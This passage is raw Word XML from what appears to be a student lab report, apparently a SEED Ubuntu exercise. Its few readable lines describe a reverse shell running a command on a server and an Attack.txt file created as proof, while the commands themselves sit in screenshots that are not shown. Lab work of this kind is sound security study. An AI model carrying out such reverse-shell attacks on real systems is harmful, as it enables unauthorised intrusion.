      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the server and is successful.</w:t>
      </w:r>
      <w:r w:rsidR="00EC5B73">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C07B5FF" w14:textId="77777777" w:rsidR="00D621EA" w:rsidRDefault="00D621EA" w:rsidP="00D621EA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EDDDB38" w14:textId="77777777" w:rsidR="00D621EA" w:rsidRDefault="00D621EA" w:rsidP="00D621EA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="102FB62F" w14:textId="77777777" w:rsidR="00D621EA" w:rsidRDefault="00D621EA" w:rsidP="00D621EA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="116CDD74" w14:textId="77777777" w:rsidR="00D621EA" w:rsidRDefault="00D621EA" w:rsidP="00D621EA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18785D58" w14:textId="77777777" w:rsidR="00D621EA" w:rsidRDefault="00D621EA" w:rsidP="00D621EA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CA1C744" w14:textId="77777777" w:rsidR="00D621EA" w:rsidRDefault="00D621EA" w:rsidP="00D621EA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="456674CA" w14:textId="77777777" w:rsidR="00D621EA" w:rsidRDefault="00D621EA" w:rsidP="00D621EA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="069B313E" w14:textId="77777777" w:rsidR="00D621EA" w:rsidRDefault="00D621EA" w:rsidP="00D621EA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ABCD26C" w14:textId="77777777" w:rsidR="00D621EA" w:rsidRDefault="00D621EA" w:rsidP="00D621EA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="226455E6" w14:textId="08E123DF" w:rsidR="006953A5" w:rsidRDefault="00D621EA" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>The command highlighted is executed by the reverse shell on the attacker machine (at time 15:04 PM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E400DD3" w14:textId="3791D4AF" w:rsidR="006953A5" w:rsidRDefault="006953A5" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7098FC70" wp14:editId="04424114">
            <wp:extent cx="5943600" cy="33172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rtualBox_SEED-UBUNTU2_04_03_2018_15_05_18.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425A092E" w14:textId="77777777" w:rsidR="006953A5" w:rsidRDefault="006953A5" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="703916F0" w14:textId="49552AC0" w:rsidR="00D621EA" w:rsidRDefault="00D621EA" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">The screenshot below shows the Attack.txt </w:t>
      </w:r>
      <w:r w:rsidR="003030BF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">file </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>on the server machine at 15:04. The file was created at 15:04 and hence the proof.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3B2034" w14:textId="604F5882" w:rsidR="005E24B1" w:rsidRPr="00DE5610" w:rsidRDefault="00326EF2" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C4973D6" wp14:editId="3D46CD23">
            <wp:extent cx="594360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rtualBox_SEED-UBUNTU Clone_04_03_2018_15_09_2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5E24B1" w:rsidRPr="00DE5610"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6A3"/>
    <w:rsid w:val="00007408"/>
    <w:rsid w:val="00016AE4"/>
    <w:rsid w:val="000266F1"/>
    <w:rsid w:val="00031882"/>
    <w:rsid w:val="00050775"/>
    <w:rsid w:val="00063105"/>
    <w:rsid w:val="00067A43"/>
    <w:rsid w:val="00070EBC"/>
    <w:rsid w:val="00081F2E"/>
    <w:rsid w:val="00085148"/>
    <w:rsid w:val="0009526D"/>
    <w:rsid w:val="000A3182"/>
    <w:rsid w:val="000A765F"/>
    <w:rsid w:val="000B1617"/>
    <w:rsid w:val="000C1008"/>
    <w:rsid w:val="000C5106"/>
    <w:rsid w:val="000D15D0"/>
    <w:rsid w:val="000D41D8"/>
    <w:rsid w:val="00107933"/>
    <w:rsid w:val="00122D55"/>
    <w:rsid w:val="001250DA"/>
    <w:rsid w:val="001325DD"/>
    <w:rsid w:val="001469FA"/>
    <w:rsid w:val="00151A29"/>
    <w:rsid w:val="0015491A"/>
    <w:rsid w:val="00161520"/>
    <w:rsid w:val="00171B9F"/>
    <w:rsid w:val="00195F62"/>
    <w:rsid w:val="0019640C"/>
    <w:rsid w:val="001A1452"/>
    <w:rsid w:val="001A36F4"/>
    <w:rsid w:val="001A4F97"/>
    <w:rsid w:val="001A7A5D"/>
    <w:rsid w:val="001B1680"/>
    <w:rsid w:val="001B3D8E"/>
    <w:rsid w:val="001B57ED"/>
    <w:rsid w:val="001C415F"/>
    <w:rsid w:val="001D24B9"/>
    <w:rsid w:val="001D6E66"/>
    <w:rsid w:val="001E0FF1"/>
    <w:rsid w:val="001E1302"/>
    <w:rsid w:val="001E3E6D"/>
    <w:rsid w:val="001E5074"/>
    <w:rsid w:val="00200B2C"/>
    <w:rsid w:val="00207895"/>
    <w:rsid w:val="00210CC2"/>
    <w:rsid w:val="00216321"/>
    <w:rsid w:val="00223322"/>
    <w:rsid w:val="00223DB8"/>
    <w:rsid w:val="0022431A"/>
    <w:rsid w:val="00226E1B"/>
    <w:rsid w:val="002333AC"/>
    <w:rsid w:val="00235316"/>
    <w:rsid w:val="002529E5"/>
    <w:rsid w:val="00261156"/>
    <w:rsid w:val="0026447F"/>
    <w:rsid w:val="00273F9E"/>
    <w:rsid w:val="00291455"/>
    <w:rsid w:val="00297D05"/>
    <w:rsid w:val="002B2CF3"/>
    <w:rsid w:val="002B3C3A"/>
    <w:rsid w:val="002D3906"/>
    <w:rsid w:val="002D3C9A"/>
    <w:rsid w:val="002D5981"/>
    <w:rsid w:val="003030BF"/>
    <w:rsid w:val="00304C3E"/>
    <w:rsid w:val="00317F48"/>
    <w:rsid w:val="00324BDC"/>
    <w:rsid w:val="00326EF2"/>
    <w:rsid w:val="00357316"/>
    <w:rsid w:val="00364300"/>
    <w:rsid w:val="00366DDB"/>
    <w:rsid w:val="003738AD"/>
    <w:rsid w:val="00376513"/>
    <w:rsid w:val="00383A21"/>
    <w:rsid w:val="003A13F1"/>
    <w:rsid w:val="003A2206"/>
    <w:rsid w:val="003A43EB"/>
    <w:rsid w:val="003B3780"/>
    <w:rsid w:val="003B3C21"/>
    <w:rsid w:val="003C5E29"/>
    <w:rsid w:val="003C6CD2"/>
    <w:rsid w:val="00400810"/>
    <w:rsid w:val="00406A8C"/>
    <w:rsid w:val="00407663"/>
    <w:rsid w:val="00407B19"/>
    <w:rsid w:val="00412A69"/>
    <w:rsid w:val="00420393"/>
    <w:rsid w:val="00426B01"/>
    <w:rsid w:val="0045552E"/>
    <w:rsid w:val="00456969"/>
    <w:rsid w:val="00465E84"/>
    <w:rsid w:val="004677BE"/>
    <w:rsid w:val="004862FE"/>
    <w:rsid w:val="00491EE6"/>
    <w:rsid w:val="004A2C7B"/>
    <w:rsid w:val="004A3333"/>
    <w:rsid w:val="004C334A"/>
    <w:rsid w:val="004D2017"/>
    <w:rsid w:val="004E4EA6"/>
    <w:rsid w:val="004F1A21"/>
    <w:rsid w:val="0051375E"/>
    <w:rsid w:val="00525BC3"/>
    <w:rsid w:val="0052679E"/>
    <w:rsid w:val="00566DD9"/>
    <w:rsid w:val="00570EC5"/>
    <w:rsid w:val="00573015"/>
    <w:rsid w:val="0057403A"/>
    <w:rsid w:val="0058141D"/>
    <w:rsid w:val="00582706"/>
    <w:rsid w:val="00590187"/>
    <w:rsid w:val="005B6A67"/>
    <w:rsid w:val="005C7C43"/>
    <w:rsid w:val="005D03A7"/>
    <w:rsid w:val="005D6201"/>
    <w:rsid w:val="005E24B1"/>
    <w:rsid w:val="005E25EB"/>
    <w:rsid w:val="005F593E"/>
    <w:rsid w:val="0061448E"/>
    <w:rsid w:val="006241CD"/>
    <w:rsid w:val="00624546"/>
    <w:rsid w:val="00635B74"/>
    <w:rsid w:val="0064139A"/>
    <w:rsid w:val="0065140C"/>
    <w:rsid w:val="0065400C"/>
    <w:rsid w:val="00655268"/>
    <w:rsid w:val="0067174C"/>
    <w:rsid w:val="00673B65"/>
    <w:rsid w:val="006871A3"/>
    <w:rsid w:val="0069223E"/>
    <w:rsid w:val="006953A5"/>
    <w:rsid w:val="006A539D"/>
    <w:rsid w:val="006A5A98"/>
    <w:rsid w:val="006C0A82"/>
    <w:rsid w:val="006C0BE3"/>
    <w:rsid w:val="006D06A3"/>
    <w:rsid w:val="006D77FF"/>
    <w:rsid w:val="00726D42"/>
    <w:rsid w:val="00733C68"/>
    <w:rsid w:val="00781A37"/>
    <w:rsid w:val="00785691"/>
    <w:rsid w:val="00793B75"/>
    <w:rsid w:val="00796560"/>
    <w:rsid w:val="007A47A1"/>
    <w:rsid w:val="007A6766"/>
    <w:rsid w:val="007D0127"/>
    <w:rsid w:val="007E5862"/>
    <w:rsid w:val="007F43DE"/>
    <w:rsid w:val="007F4A99"/>
    <w:rsid w:val="00803F73"/>
    <w:rsid w:val="00815443"/>
    <w:rsid w:val="0081778E"/>
    <w:rsid w:val="008238A3"/>
    <w:rsid w:val="008247FE"/>
    <w:rsid w:val="008257A2"/>
    <w:rsid w:val="00851824"/>
    <w:rsid w:val="00854CDC"/>
    <w:rsid w:val="00857BBC"/>
    <w:rsid w:val="00862D8B"/>
    <w:rsid w:val="00886247"/>
    <w:rsid w:val="0089021E"/>
    <w:rsid w:val="008A316C"/>
    <w:rsid w:val="008A458F"/>
    <w:rsid w:val="008A7888"/>
    <w:rsid w:val="008C5B91"/>
    <w:rsid w:val="008C7617"/>
    <w:rsid w:val="008D4C19"/>
    <w:rsid w:val="008E5256"/>
    <w:rsid w:val="008E620E"/>
    <w:rsid w:val="00927428"/>
    <w:rsid w:val="00964FB7"/>
    <w:rsid w:val="0098121B"/>
    <w:rsid w:val="009B5485"/>
    <w:rsid w:val="009C73C5"/>
    <w:rsid w:val="009D3F3A"/>
    <w:rsid w:val="009D3F53"/>
    <w:rsid w:val="009E381C"/>
    <w:rsid w:val="009F0556"/>
    <w:rsid w:val="009F1BC4"/>
    <w:rsid w:val="00A00B39"/>
    <w:rsid w:val="00A30366"/>
    <w:rsid w:val="00A33F69"/>
    <w:rsid w:val="00A3789B"/>
    <w:rsid w:val="00A52910"/>
    <w:rsid w:val="00A52BAE"/>
    <w:rsid w:val="00A651FC"/>
    <w:rsid w:val="00A83560"/>
    <w:rsid w:val="00A841DF"/>
    <w:rsid w:val="00A8467B"/>
    <w:rsid w:val="00A96A93"/>
    <w:rsid w:val="00AC3294"/>
    <w:rsid w:val="00AC33F3"/>
    <w:rsid w:val="00AE741C"/>
    <w:rsid w:val="00AF7183"/>
    <w:rsid w:val="00B13E95"/>
    <w:rsid w:val="00B333AE"/>
    <w:rsid w:val="00B52F70"/>
    <w:rsid w:val="00B616DF"/>
    <w:rsid w:val="00B67417"/>
    <w:rsid w:val="00B73B47"/>
    <w:rsid w:val="00B8516A"/>
    <w:rsid w:val="00B927C6"/>
    <w:rsid w:val="00B9774D"/>
    <w:rsid w:val="00BA4A96"/>
    <w:rsid w:val="00BA5FDC"/>
    <w:rsid w:val="00BC7791"/>
    <w:rsid w:val="00BD3236"/>
    <w:rsid w:val="00BF3A35"/>
    <w:rsid w:val="00C00C09"/>
    <w:rsid w:val="00C05D90"/>
    <w:rsid w:val="00C30C02"/>
    <w:rsid w:val="00C42B82"/>
    <w:rsid w:val="00C438AD"/>
    <w:rsid w:val="00C44B42"/>
    <w:rsid w:val="00C500DA"/>
    <w:rsid w:val="00C54530"/>
    <w:rsid w:val="00C61929"/>
    <w:rsid w:val="00C7425A"/>
    <w:rsid w:val="00C7568B"/>
    <w:rsid w:val="00C83AE1"/>
    <w:rsid w:val="00C93C2A"/>
    <w:rsid w:val="00CA4439"/>
    <w:rsid w:val="00CB7C12"/>
    <w:rsid w:val="00CC3A03"/>
    <w:rsid w:val="00CF5196"/>
    <w:rsid w:val="00D078C8"/>
    <w:rsid w:val="00D14D43"/>
    <w:rsid w:val="00D306B2"/>
    <w:rsid w:val="00D56173"/>
    <w:rsid w:val="00D621EA"/>
    <w:rsid w:val="00D71B5B"/>
    <w:rsid w:val="00D8639E"/>
    <w:rsid w:val="00DA04DA"/>
    <w:rsid w:val="00DE5610"/>
    <w:rsid w:val="00DF6744"/>
    <w:rsid w:val="00E03B3D"/>
    <w:rsid w:val="00E44D09"/>
    <w:rsid w:val="00E52F42"/>
    <w:rsid w:val="00E55CE3"/>
    <w:rsid w:val="00E5614D"/>
    <w:rsid w:val="00E62786"/>
    <w:rsid w:val="00E642E1"/>
    <w:rsid w:val="00E80822"/>
    <w:rsid w:val="00E84768"/>
    <w:rsid w:val="00EA54FB"/>
    <w:rsid w:val="00EA7870"/>
    <w:rsid w:val="00EC2274"/>
    <w:rsid w:val="00EC2D11"/>
    <w:rsid w:val="00EC5B73"/>
    <w:rsid w:val="00EE00E3"/>
    <w:rsid w:val="00EE6173"/>
    <w:rsid w:val="00F32A1C"/>
    <w:rsid w:val="00F53441"/>
    <w:rsid w:val="00F60637"/>
    <w:rsid w:val="00F6485A"/>
    <w:rsid w:val="00F760C5"/>
    <w:rsid w:val="00F76AE3"/>
    <w:rsid w:val="00F81A8B"/>
    <w:rsid w:val="00FB2AEC"/>
    <w:rsid w:val="00FB5A95"/>
    <w:rsid w:val="00FE104C"/>
    <w:rsid w:val="00FE24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C56C2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9656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752064">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="301736696">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="797183316">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="870456421">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="908424025">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1487745275">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1559976734">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1793397427">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1854342845">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1897547170">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2081902264">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="21070767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37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.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20</Pages>
  <Words>1404</Words>
  <Characters>8007</Characters>
  <Application>Microsoft Macintosh Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>66</Lines>
  <Paragraphs>18</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>9393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919</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-02-27T02:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-03-06T05:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>